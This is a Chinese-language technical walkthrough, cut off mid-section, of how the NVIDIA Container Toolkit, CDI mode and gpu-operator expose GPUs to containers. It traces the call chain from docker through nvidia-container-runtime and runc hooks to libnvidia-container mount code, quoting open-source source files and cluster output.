根据"Support for Container Device Interface — NVIDIA Container Toolkit documentation"(https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html#):

从 v1.12.0 版本开始,NVIDIA 容器工具包支持生成容器设备接口(CDI)规范。CDI 是一个开放的容器运行时规范,它抽象了对设备(如 NVIDIA GPU)的访问含义,并在各个容器运行时中标准化了访问方式。流行的容器运行时可以读取并处理这一规范,以确保设备在容器中可用。CDI 简化了对 NVIDIA GPU 等设备的支持添加,因为该规范适用于所有支持 CDI 的容器运行时。

通过分析代码确认,CDI 模式通过将挂载配置、设备直接写入到 oci spec, 而不会执行 nvidia-container-cli configure, 也就不会自行实现挂载了,同时也不支持 cuda 兼容特性。

$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml
$ docker run --rm -ti --runtime=nvidia     -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ubuntu cat /proc/self/mountinfo |grep overlay
643 534 0:48 / / rw,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/VWXTSEW55YTGJ23XYVXBZE6TIH:/var/lib/docker/overlay2/l/F3QZDOFKONMKPK4LRXRABM3LRQ,upperdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/diff,workdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/work

1.4 gpu-operator

参考 "官方文档"(https://docs.nvidia.com/datacenter/cloud-native/gpu-operator/latest/getting-started.html), 安装gpu-operator。

gpu-operator 将通过名为 nvidia-container-toolkit-daemonset 的容器,挂载主机目录,将 nvidia-container-toolkit 安装到主机的 /usr/local/nvidia 目录。

$ kubectl --kubeconfig wanglei-k8s-gpu-kubeconfig.yaml describe pod -n gpu-operator nvidia-container-toolkit-daemonset-fzznt
Name:                 nvidia-container-toolkit-daemonset-fzznt
Namespace:            gpu-operator
Priority:             2000001000
Priority Class Name:  system-node-critical
Node:                 10.0.2.70/10.0.2.70
Start Time:           Thu, 28 Nov 2024 21:00:54 +0800
Labels:               app=nvidia-container-toolkit-daemonset
                      app.kubernetes.io/managed-by=gpu-operator
                      controller-revision-hash=5798fb59f4
                      helm.sh/chart=gpu-operator-v24.9.0
                      pod-template-generation=1
Annotations:          <none>
Status:               Running
IP:                   172.16.0.146
IPs:
  IP:           172.16.0.146
Controlled By:  DaemonSet/nvidia-container-toolkit-daemonset
Init Containers:
  driver-validation:
    Container ID:  containerd://0b6689ed6d9dc8c9103934a900a865faf4fc2604356097b3b151e9b5ffb28310
    Image:         nvcr.io/nvidia/cloud-native/gpu-operator-validator:v24.9.0
    Image ID:      nvcr.io/nvidia/cloud-native/gpu-operator-validator@sha256:70a0bd29259820d6257b04b0cdb6a175f9783d4dd19ccc4ec6599d407c359ba5
    Port:          <none>
    Host Port:     <none>
    Command:
      sh
      -c
    Args:
      nvidia-validator
    State:          Terminated
      Reason:       Completed
      Exit Code:    0
      Started:      Thu, 28 Nov 2024 21:00:55 +0800
      Finished:     Thu, 28 Nov 2024 21:04:41 +0800
    Ready:          True
    Restart Count:  0
    Environment:
      WITH_WAIT:           true
      COMPONENT:           driver
      OPERATOR_NAMESPACE:  gpu-operator (v1:metadata.namespace)
    Mounts:
      /host from host-root (ro)
      /host-dev-char from host-dev-char (rw)
      /run/nvidia/driver from driver-install-dir (rw)
      /run/nvidia/validations from run-nvidia-validations (rw)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Containers:
  nvidia-container-toolkit-ctr:
    Container ID:  containerd://c236b579e2cd400d98d7a34fb9e4b9037322ad620445da3f1fc91518142ba615
    Image:         nvcr.io/nvidia/k8s/container-toolkit:v1.17.0-ubuntu20.04
    Image ID:      nvcr.io/nvidia/k8s/container-toolkit@sha256:c458c33da393dda19e53dae4cb82f02203714ce0f5358583bf329f3693ec84cb
    Port:          <none>
    Host Port:     <none>
    Command:
      /bin/bash
      -c
    Args:
      /bin/entrypoint.sh
    State:          Running
      Started:      Thu, 28 Nov 2024 21:04:54 +0800
    Ready:          True
    Restart Count:  0
    Environment:
      ...
    Mounts:
      /bin/entrypoint.sh from nvidia-container-toolkit-entrypoint (ro,path="entrypoint.sh")
      /driver-root from driver-install-dir (rw)
      /host from host-root (ro)
      /run/nvidia/toolkit from toolkit-root (rw)
      /run/nvidia/validations from run-nvidia-validations (rw)
      /runtime/config-dir/ from containerd-config (rw)
      /runtime/sock-dir/ from containerd-socket (rw)
      /usr/local/nvidia from toolkit-install-dir (rw)
      /usr/share/containers/oci/hooks.d from crio-hooks (rw)
      /var/run/cdi from cdi-root (rw)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Conditions:
  ...
Volumes:
  nvidia-container-toolkit-entrypoint:
    Type:      ConfigMap (a volume populated by a ConfigMap)
    Name:      nvidia-container-toolkit-entrypoint
    Optional:  false
  toolkit-root:
    Type:          HostPath (bare host directory volume)
    Path:          /run/nvidia/toolkit
    HostPathType:  DirectoryOrCreate
  run-nvidia-validations:
    Type:          HostPath (bare host directory volume)
    Path:          /run/nvidia/validations
    HostPathType:  DirectoryOrCreate
  driver-install-dir:
    Type:          HostPath (bare host directory volume)
    Path:          /run/nvidia/driver
    HostPathType:  DirectoryOrCreate
  host-root:
    Type:          HostPath (bare host directory volume)
    Path:          /
    HostPathType:  
  toolkit-install-dir:
    Type:          HostPath (bare host directory volume)
    Path:          /usr/local/nvidia
    HostPathType:  
  crio-hooks:
    Type:          HostPath (bare host directory volume)
    Path:          /run/containers/oci/hooks.d
    HostPathType:  
  host-dev-char:
    Type:          HostPath (bare host directory volume)
    Path:          /dev/char
    HostPathType:  
  cdi-root:
    Type:          HostPath (bare host directory volume)
    Path:          /var/run/cdi
    HostPathType:  DirectoryOrCreate
  containerd-config:
    Type:          HostPath (bare host directory volume)
    Path:          /etc/containerd
    HostPathType:  DirectoryOrCreate
  containerd-socket:
    Type:          HostPath (bare host directory volume)
    Path:          /run/containerd
    HostPathType:  
...

在启动gpu容器前监听进程,验证发现仍通过 nvidia-container-toolkit 来实现。

root@wanglei-k8s-gpu-02862:~# while true; do ps -ef |grep nvidia-container-cli|grep -v grep; done
root       91175   91173  0 21:04 ?        00:00:00 /bin/sh /usr/local/nvidia/toolkit/nvidia-container-cli --root=/run/nvidia/driver --load-kmods configure --ldconfig=@/run/nvidia/driver/sbin/ldconfig.real --device=GPU-1401ffea-de99-b446-2a8c-15e0797f35bb --compat32 --compute --display --graphics --ngx --utility --video --pid=91165 /mnt/paas/runtime/overlay2/332208ab1f6248114caa9ed78edfcfe09cee0ecf6939e46c942b1e4394df65da/merged

2. 调用链分析

  • nvidia-container-cli(https://github.com/NVIDIA/libnvidia-container/tree/main/src/cli)
  • libnvidia-container(https://github.com/NVIDIA/libnvidia-container)

2.1 docker-cli --gpus 传递至 docker daemon

docker run 和 docker create 命令提供了 --gpus 参数,用于指定要传递给容器的 gpu 设备, 下面以 docker create 命令为例分析调用链。

https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L79

func NewCreateCommand(dockerCli command.Cli) *cobra.Command {
  ...
 cmd := &cobra.Command{
  Use:   "create [OPTIONS] IMAGE [COMMAND] [ARG...]",
  Short: "Create a new container",
    ...
  }
  ...
 copts = addFlags(flags)
  ...
}

通过指定 --gpus 参数,设置到 hostConfig 中传递至 docker daemon 。

https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L190

func addFlags(flags *pflag.FlagSet) *containerOptions {
  copts := &containerOptions{
    ...
    gpus                opts.GpuOpts
    ...
  }
  ...
  flags.Var(&copts.gpus, "gpus""GPU devices to add to the container ('all' to pass all GPUs)")
  ...
}

https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L593

func parse(flags *pflag.FlagSet, copts *containerOptions, serverOS string) (*containerConfig, error) {
  ...
  deviceRequests := copts.gpus.Value()
iflen(cdiDeviceNames) > 0 {
    cdiDeviceRequest := container.DeviceRequest{
      Driver:    "cdi",
      DeviceIDs: cdiDeviceNames,
    }
    deviceRequests = append(deviceRequests, cdiDeviceRequest)
  }
  resources := container.Resources{
    ...
    DeviceRequests:       deviceRequests,
  }
  ...
  hostConfig := &container.HostConfig{
    ...
    Resources:      resources,
    ...
  }
  ...
return &containerConfig{
    Config:           config,
    HostConfig:       hostConfig,
    NetworkingConfig: networkingConfig,
  }, nil
}

https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L265C2-L265C120

func runCreate(ctx context.Context, dockerCli command.Cli, flags *pflag.FlagSet, options *createOptions, copts *containerOptions) error {
  ...
 containerCfg, err := parse(flags, copts, dockerCli.ServerInfo().OSType)
  ...
 id, err := createContainer(ctx, dockerCli, containerCfg, options)
  ...
}

func createContainer(ctx context.Context, dockerCli command.Cli, containerCfg *containerConfig, options *createOptions) (containerID string, err error) {
  ...
  response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, platform, options.name)
  ...
}

2.2 docker daemon 创建 spec

在容器启动时,创建 spec,设置 prestart hook 配置。

https://github.com/moby/moby/blob/v27.1.0/daemon/start.go#L143C2-L143C65

func (daemon *Daemon) ContainerStart(ctx context.Context, name string, checkpoint string, checkpointDir string) error {
 ...
 return daemon.containerStart(ctx, daemonCfg, ctr, checkpoint, checkpointDir, true)
}

func (daemon *Daemon) containerStart(ctx context.Context, daemonCfg *configStore, container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (retErr error) {
 ...
 spec, err := daemon.createSpec(ctx, daemonCfg, container, mnts)
 ...
}

https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L1042

func (daemon *Daemon) createSpec(ctx context.Context, daemonCfg *configStore, c *container.Container, mounts []container.Mount) (retSpec *specs.Spec, err error) {
 ...
 opts = append(opts,
  ...
  WithDevices(daemon, c),
  ...
 )
 ...
}

https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L934-L938

func WithDevices(daemon *Daemon, c *container.Container) coci.SpecOpts {
 return func(ctx context.Context, _ coci.Client, _ *containers.Container, s *coci.Spec) error {
  ...
  for _, req := range c.HostConfig.DeviceRequests {
   if err := daemon.handleDevice(req, s); err != nil {
    return err
   }
  }
  ...
 }
}

https://github.com/moby/moby/blob/v27.1.0/daemon/devices.go#L29

func (daemon *Daemon) handleDevice(req container.DeviceRequest, spec *specs.Spec) error {
if req.Driver == "" {
for _, dd := range deviceDrivers {
   if selected := dd.capset.Match(req.Capabilities); selected != nil {
    return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
   }
  }
 } elseif dd := deviceDrivers[req.Driver]; dd != nil {
if req.Driver == "cdi" {
   return dd.updateSpec(spec, &deviceInstance{req: req})
  }
if selected := dd.capset.Match(req.Capabilities); selected != nil {
   return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
  }
 }
return incompatibleDeviceRequest{req.Driver, req.Capabilities}
}

https://github.com/moby/moby/blob/v27.1.0/daemon/nvidia_linux.go#L92-L99

const nvidiaHook = "nvidia-container-runtime-hook"

func init() {
if _, err := exec.LookPath(nvidiaHook); err != nil {
// do not register Nvidia driver if helper binary is not present.
return
 }
 capset := capabilities.Set{"gpu"struct{}{}, "nvidia"struct{}{}}
 nvidiaDriver := &deviceDriver{
  capset:     capset,
  updateSpec: setNvidiaGPUs,
 }
for c := range allNvidiaCaps {
  nvidiaDriver.capset[string(c)] = struct{}{}
 }
 registerDeviceDriver("nvidia", nvidiaDriver)
}

func setNvidiaGPUs(s *specs.Spec, dev *deviceInstance) error {
 req := dev.req
if req.Count != 0 && len(req.DeviceIDs) > 0 {
return errConflictCountDeviceIDs
 }

iflen(req.DeviceIDs) > 0 {
  s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+strings.Join(req.DeviceIDs, ","))
 } elseif req.Count > 0 {
  s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+countToDevices(req.Count))
 } elseif req.Count < 0 {
  s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES=all")
 }

var nvidiaCaps []string
// req.Capabilities contains device capabilities, some but not all are NVIDIA driver capabilities.
for _, c := range dev.selectedCaps {
  nvcap := nvidia.Capability(c)
if _, isNvidiaCap := allNvidiaCaps[nvcap]; isNvidiaCap {
   nvidiaCaps = append(nvidiaCaps, c)
   continue
  }
// TODO: nvidia.WithRequiredCUDAVersion
// for now we let the prestart hook verify cuda versions but errors are not pretty.
 }

if nvidiaCaps != nil {
  s.Process.Env = append(s.Process.Env, "NVIDIA_DRIVER_CAPABILITIES="+strings.Join(nvidiaCaps, ","))
 }

 path, err := exec.LookPath(nvidiaHook)
if err != nil {
return err
 }

if s.Hooks == nil {
  s.Hooks = &specs.Hooks{}
 }

// This implementation uses prestart hooks, which are deprecated.
// CreateRuntime is the closest equivalent, and executed in the same
// locations as prestart-hooks, but depending on what these hooks do,
// possibly one of the other hooks could be used instead (such as
// CreateContainer or StartContainer).
 s.Hooks.Prestart = append(s.Hooks.Prestart, specs.Hook{ //nolint:staticcheck // FIXME(thaJeztah); replace prestart hook with a non-deprecated one.
  Path: path,
  Args: []string{
   nvidiaHook,
   "prestart",
  },
  Env: os.Environ(),
 })

returnnil
}

docker 设置完 spec 后,将启动runtime。

2.3 nvidia-container-runtime 调用 runc

nvidia-container-toolkit 在安装时会将 runtime 设置为 nvidia-container-runtime。

nvidia-container-runtime 作为一层shim, 将会把docker传递过来的spec配置透传给更底层的runtime,通常默认是runc。

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/config/config.go#L110

func GetDefault() (*Config, error) {
 d := Config{
  ...
  NVIDIAContainerRuntimeConfig: RuntimeConfig{
   ...
   Runtimes:      []string{"docker-runc""runc""crun"},
   ...
  },
  ...
 }
 ...
}

那么 nvidia-container-runtime 存在的意义是什么呢,主要是为了修改 spec,这实际上和 docker 前面修改的 prestart hooks 有一些冗余,不过 nvidia-container-runtime 会修改更多内容。

下面我们来跟踪完整的 nvidia-container-runtime 调用链。

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime/main.go#L11

func main() {
 r := runtime.New()
 err := r.Run(os.Args)
 if err != nil {
  os.Exit(1)
 }
}

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime.go#L82

func (r rt) Run(argv []string) (rerr error) {
 ...
 runtime, err := newNVIDIAContainerRuntime(r.logger, cfg, argv, driver)
 ...
 return runtime.Exec(argv)
}
  • 如果执行的命令不是create,则直接调用 runc
  • 如果执行create命令,则修改spec, 修改包括 modeModifier, graphicsModifier, featureModifie

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L49

func newNVIDIAContainerRuntime(logger logger.Interface, cfg *config.Config, argv []string, driver *root.Driver) (oci.Runtime, error) {
 lowLevelRuntime, err := oci.NewLowLevelRuntime(logger, cfg.NVIDIAContainerRuntimeConfig.Runtimes)
 ...
if !oci.HasCreateSubcommand(argv) {
  logger.Tracef("Skipping modifier for non-create subcommand")
return lowLevelRuntime, nil
 }

 ociSpec, err := oci.NewSpec(logger, argv)
 ...
 specModifier, err := newSpecModifier(logger, cfg, ociSpec, driver)
 ...
// Create the wrapping runtime with the specified modifier.
 r := oci.NewModifyingRuntimeWrapper(
  logger,
  lowLevelRuntime,
  ociSpec,
  specModifier,
 )

return r, nil
}

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/oci/runtime_modifier.go#L56

func (r *modifyingRuntimeWrapper) Exec(args []string) error {
if HasCreateSubcommand(args) {
  r.logger.Debugf("Create command detected; applying OCI specification modifications")
  err := r.modify()
if err != nil {
   return fmt.Errorf("could not apply required modification to OCI specification: %w", err)
  }
  r.logger.Debugf("Applied required modification to OCI specification")
 }

 r.logger.Debugf("Forwarding command to runtime %v", r.runtime.String())
return r.runtime.Exec(args)
}

2.4 nvidia-container-runtime 具体会对 spec 修改什么

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L66 7

// newSpecModifier is a factory method that creates constructs an OCI spec modifer based on the provided config.
func newSpecModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec, driver *root.Driver) (oci.SpecModifier, error) {
 rawSpec, err := ociSpec.Load()
if err != nil {
returnnil, fmt.Errorf("failed to load OCI spec: %v", err)
 }

 image, err := image.NewCUDAImageFromSpec(rawSpec)
if err != nil {
returnnil, err
 }

 mode := info.ResolveAutoMode(logger, cfg.NVIDIAContainerRuntimeConfig.Mode, image)
 modeModifier, err := newModeModifier(logger, mode, cfg, ociSpec, image)
if err != nil {
returnnil, err
 }
// For CDI mode we make no additional modifications.
if mode == "cdi" {
return modeModifier, nil
 }

 graphicsModifier, err := modifier.NewGraphicsModifier(logger, cfg, image, driver)
if err != nil {
returnnil, err
 }

 featureModifier, err := modifier.NewFeatureGatedModifier(logger, cfg, image)
if err != nil {
returnnil, err
 }

 modifiers := modifier.Merge(
  modeModifier,
  graphicsModifier,
  featureModifier,
 )
return modifiers, nil
}

modeModifier 有3种。

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L105

func newModeModifier(logger logger.Interface, mode string, cfg *config.Config, ociSpec oci.Spec, image image.CUDA) (oci.SpecModifier, error) {
switch mode {
case"legacy":
return modifier.NewStableRuntimeModifier(logger, cfg.NVIDIAContainerRuntimeHookConfig.Path), nil
case"csv":
return modifier.NewCSVModifier(logger, cfg, image)
case"cdi":
return modifier.NewCDIModifier(logger, cfg, ociSpec)
 }

returnnil, fmt.Errorf("invalid runtime mode: %v", cfg.NVIDIAContainerRuntimeConfig.Mode)
}

如果 mode 为 cdi, 则仅执行 modeModifier 。CDIModifiler 负责修改 spec中的hooks, devices,mounts 配置(这些配置已在/etc/cdi/nvidia.yaml中声明)。

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/cdi.go#L37

func NewCDIModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec) (oci.SpecModifier, error) {
 devices, err := getDevicesFromSpec(logger, ociSpec, cfg)
if err != nil {
returnnil, fmt.Errorf("failed to get required devices from OCI specification: %v", err)
 }
iflen(devices) == 0 {
  logger.Debugf("No devices requested; no modification required.")
returnnilnil
 }
 logger.Debugf("Creating CDI modifier for devices: %v", devices)

 automaticDevices := filterAutomaticDevices(devices)
iflen(automaticDevices) != len(devices) && len(automaticDevices) > 0 {
returnnil, fmt.Errorf("requesting a CDI device with vendor 'runtime.nvidia.com' is not supported when requesting other CDI devices")
 }
iflen(automaticDevices) > 0 {
  automaticModifier, err := newAutomaticCDISpecModifier(logger, cfg, automaticDevices)
if err == nil {
   return automaticModifier, nil
  }
  logger.Warningf("Failed to create the automatic CDI modifier: %w", err)
  logger.Debugf("Falling back to the standard CDI modifier")
 }

return cdi.New(
  cdi.WithLogger(logger),
  cdi.WithDevices(devices...),
  cdi.WithSpecDirs(cfg.NVIDIAContainerRuntimeConfig.Modes.CDI.SpecDirs...),
 )
}

LegacyModifier 会修改 runc prestart hook

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/stable.go#L33

func NewStableRuntimeModifier(logger logger.Interface, nvidiaContainerRuntimeHookPath string) oci.SpecModifier {
 m := stableRuntimeModifier{
  logger:                         logger,
  nvidiaContainerRuntimeHookPath: nvidiaContainerRuntimeHookPath,
 }
 return &m
}

CSVModifier 支持通过csv文件主动提供设备的具体配置,与CDI模式类似,直接修改 oci spec 中的 devices 配置。

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/csv.go#L42

func NewCSVModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
  logger.Infof("No modification required; no devices requested")
returnnilnil
 }
 logger.Infof("Constructing modifier from config: %+v", *cfg)

if err := checkRequirements(logger, image); err != nil {
returnnil, fmt.Errorf("requirements not met: %v", err)
 }

 csvFiles, err := csv.GetFileList(cfg.NVIDIAContainerRuntimeConfig.Modes.CSV.MountSpecPath)
if err != nil {
returnnil, fmt.Errorf("failed to get list of CSV files: %v", err)
 }

if image.Getenv(nvidiaRequireJetpackEnvvar) != "csv-mounts=all" {
  csvFiles = csv.BaseFilesOnly(csvFiles)
 }

 cdilib, err := nvcdi.New(
  nvcdi.WithLogger(logger),
  nvcdi.WithDriverRoot(cfg.NVIDIAContainerCLIConfig.Root),
  nvcdi.WithNVIDIACDIHookPath(cfg.NVIDIACTKConfig.Path),
  nvcdi.WithMode(nvcdi.ModeCSV),
  nvcdi.WithCSVFiles(csvFiles),
 )
if err != nil {
returnnil, fmt.Errorf("failed to construct CDI library: %v", err)
 }

 spec, err := cdilib.GetSpec()
if err != nil {
returnnil, fmt.Errorf("failed to get CDI spec: %v", err)
 }

 cdiModifier, err := cdi.New(
  cdi.WithLogger(logger),
  cdi.WithSpec(spec.Raw()),
 )
if err != nil {
returnnil, fmt.Errorf("failed to construct CDI modifier: %v", err)
 }

 modifiers := Merge(
  nvidiaContainerRuntimeHookRemover{logger},
  cdiModifier,
 )

return modifiers, nil
}

GraphicsModifier

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/graphics.go#L32

func NewGraphicsModifier(logger logger.Interface, cfg *config.Config, image image.CUDA, driver *root.Driver) (oci.SpecModifier, error) {
if required, reason := requiresGraphicsModifier(image); !required {
  logger.Infof("No graphics modifier required: %v", reason)
returnnilnil
 }

 nvidiaCDIHookPath := cfg.NVIDIACTKConfig.Path

 mounts, err := discover.NewGraphicsMountsDiscoverer(
  logger,
  driver,
  nvidiaCDIHookPath,
 )
if err != nil {
returnnil, fmt.Errorf("failed to create mounts discoverer: %v", err)
 }

// In standard usage, the devRoot is the same as the driver.Root.
 devRoot := driver.Root
 drmNodes, err := discover.NewDRMNodesDiscoverer(
  logger,
  image.DevicesFromEnvvars(visibleDevicesEnvvar),
  devRoot,
  nvidiaCDIHookPath,
 )
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer: %v", err)
 }

 d := discover.Merge(
  drmNodes,
  mounts,
 )
return NewModifierFromDiscoverer(logger, d)
}

FeatureGatedModifier 根据配置中的开关,修改 oci中的设备和挂载配置。如启用相关特性,则新增对应的设备或挂载配置。

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/gated.go#L38

// NewFeatureGatedModifier creates the modifiers for optional features.
// These include:
//
// NVIDIA_GDS=enabled
// NVIDIA_MOFED=enabled
// NVIDIA_NVSWITCH=enabled
// NVIDIA_GDRCOPY=enabled
//
// If not devices are selected, no changes are made.
func NewFeatureGatedModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
  logger.Infof("No modification required; no devices requested")
returnnilnil
 }

var discoverers []discover.Discover

 driverRoot := cfg.NVIDIAContainerCLIConfig.Root
 devRoot := cfg.NVIDIAContainerCLIConfig.Root

if cfg.Features.IsEnabled(config.FeatureGDS, image) {
  d, err := discover.NewGDSDiscoverer(logger, driverRoot, devRoot)
if err != nil {
   returnnil, fmt.Errorf("failed to construct discoverer for GDS devices: %w", err)
  }
  discoverers = append(discoverers, d)
 }

if cfg.Features.IsEnabled(config.FeatureMOFED, image) {
  d, err := discover.NewMOFEDDiscoverer(logger, devRoot)
if err != nil {
   returnnil, fmt.Errorf("failed to construct discoverer for MOFED devices: %w", err)
  }
  discoverers = append(discoverers, d)
 }

if cfg.Features.IsEnabled(config.FeatureNVSWITCH, image) {
  d, err := discover.NewNvSwitchDiscoverer(logger, devRoot)
if err != nil {
   returnnil, fmt.Errorf("failed to construct discoverer for NVSWITCH devices: %w", err)
  }
  discoverers = append(discoverers, d)
 }

if cfg.Features.IsEnabled(config.FeatureGDRCopy, image) {
  d, err := discover.NewGDRCopyDiscoverer(logger, devRoot)
if err != nil {
   returnnil, fmt.Errorf("failed to construct discoverer for GDRCopy devices: %w", err)
  }
  discoverers = append(discoverers, d)
 }

return NewModifierFromDiscoverer(logger, discover.Merge(discoverers...))
}

2.5 runc 在 prestart hook 阶段调用 nvidia-container-runtime-hook

https://github.com/opencontainers/runc/blob/v1.1.13/libcontainer/process_linux.go#L462

func (p *initProcess) start() (retErr error) {
 ...
 ierr := parseSync(p.messageSockPair.parent, func(sync *syncT) error {
switch sync.Type {
case procSeccomp:
   ...
case procReady:
   ...
   if err := hooks[configs.Prestart].RunHooks(s); err != nil {
    return err
   }
   ...
case procHooks:
   ...
   if err := hooks[configs.Prestart].RunHooks(s); err != nil {
    return err
   }
   ...
default:
   ...
  }
 }
 ...
}

2.6 nvidia-container-runtime-hook 调用 nvidia-container-cli

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L179

func main() {
 ...
switch args[0] {
case"prestart":
  doPrestart()
  os.Exit(0)
case"poststart":
fallthrough
case"poststop":
  os.Exit(0)
default:
  flag.Usage()
  os.Exit(2)
 }
}

执行 nvidia-container-cli 的 configure 命令。

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L149

func doPrestart() {
 ...
 args := []string{getCLIPath(cli)}
 ...
 args = append(args, "configure")
 ...
 err = syscall.Exec(args[0], args, env)
 ...
}

2.7 nvidia-container-cli 调用 libnvidia-container

nvidia-container-cli 做了一个转换,把 libnvidia-container 中函数的 nvc_xxx 前缀移除了, 改为通过 libnvc.xxx 的形式调用。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/main.c#L140

int
main(int argc, char *argv[])
{
 ...
        if ((rv = load_libnvc()) != 0)
                goto fail;
 ...
}

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/libnvc.c#L137

int
load_libnvc(void)
{
        if (is_tegra() && !nvml_available())
                return load_libnvc_v0();
        return load_libnvc_v1();
}
...
static int
load_libnvc_v1(void)
{
        #define load_libnvc_func(func)
            libnvc.func = nvc_##func


        load_libnvc_func(config_free);
        ...
}

nvidia-container-cli configure 会执行很多 mount 操作。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/configure.c#L376-L433

int
configure_command(const struct context *ctx)
{
 ...
        if (libnvc.driver_mount(nvc, cnt, drv) < 0) {
                warnx("mount error: %s", libnvc.error(nvc));
                goto fail;
        }
        for (size_t i = 0; i < devices.ngpus; ++i) {
                if (libnvc.device_mount(nvc, cnt, devices.gpus[i]) < 0) {
                        warnx("mount error: %s", libnvc.error(nvc));
                        goto fail;
                }
        }
        if (!mig_config_devices.all && !mig_monitor_devices.all) {
                for (size_t i = 0; i < devices.nmigs; ++i) {
                        if (libnvc.mig_device_access_caps_mount(nvc, cnt, devices.migs[i]) < 0) {
                                warnx("mount error: %s", libnvc.error(nvc));
                                goto fail;
                        }
                }
        }
        if (mig_config_devices.all && mig_config_devices.ngpus) {
                if (libnvc.mig_config_global_caps_mount(nvc, cnt) < 0) {
                        warnx("mount error: %s", libnvc.error(nvc));
                        goto fail;
                }
                for (size_t i = 0; i < mig_config_devices.ngpus; ++i) {
                        if (libnvc.device_mig_caps_mount(nvc, cnt, mig_config_devices.gpus[i]) < 0) {
                                warnx("mount error: %s", libnvc.error(nvc));
                                goto fail;
                        }
                }
        }
        if (mig_monitor_devices.all && mig_monitor_devices.ngpus) {
                if (libnvc.mig_monitor_global_caps_mount(nvc, cnt) < 0) {
                        warnx("mount error: %s", libnvc.error(nvc));
                        goto fail;
                }
                for (size_t i = 0; i < mig_monitor_devices.ngpus; ++i) {
                        if (libnvc.device_mig_caps_mount(nvc, cnt, mig_monitor_devices.gpus[i]) < 0) {
                                warnx("mount error: %s", libnvc.error(nvc));
                                goto fail;
                        }
                }
        }
        for (size_t i = 0; i < nvc_cfg->imex.nchans; ++i) {
                if (libnvc.imex_channel_mount(nvc, cnt, &nvc_cfg->imex.chans[i]) < 0) {
                        warnx("mount error: %s", libnvc.error(nvc));
                        goto fail;
                }
        }
 ...
        if (libnvc.ldcache_update(nvc, cnt) < 0) {
                warnx("ldcache error: %s", libnvc.error(nvc));
                goto fail;
        }
 ...
}

2.8 libnvidia-container nvc_driver_mount 函数挂载相关文件

nvc_driver_mount() 挂载:

  • procfs: 将主机 /proc/driver/nvidia 下的相关文件挂载至容器内
  • app_profile: 将主机 /etc/nvidia/nvidia-application-profiles-rc.d 相关的配置文件挂载至容器内
  • Host binary and library: 将主机 二进制程序、依赖库 挂载至容器内
  • Container library mounts: 为了实现前向兼容,用户可以提供更新版本的cuda库,将容器/usr/local/cuda/compat目录下较新的CUDA库,挂载到容器 lib 目录。
  • Firmware: 将主机 /lib/firmware/nvidia 下的相关文件挂载至容器内
  • IPC: 将主机 /var/run/nvidia-persistenced/socket 下的相关文件挂载至容器内
  • Device: 将主机 /dev/nvidia-uvm/dev/nvidia-uvm-tools下的相关文件挂载至容器内

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L712

int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
        ...
        if (ns_enter(&ctx->err, cnt->mnt_ns, CLONE_NEWNS) < 0)
                return (-1);
        ...
        /* Procfs mount */
        if (ctx->dxcore.initialized)
                log_warn("skipping procfs mount on WSL");
        elseif ((*ptr++ = mount_procfs(&ctx->err, ctx->cfg.root, cnt)) == NULL)
                goto fail;

        /* Application profile mount */
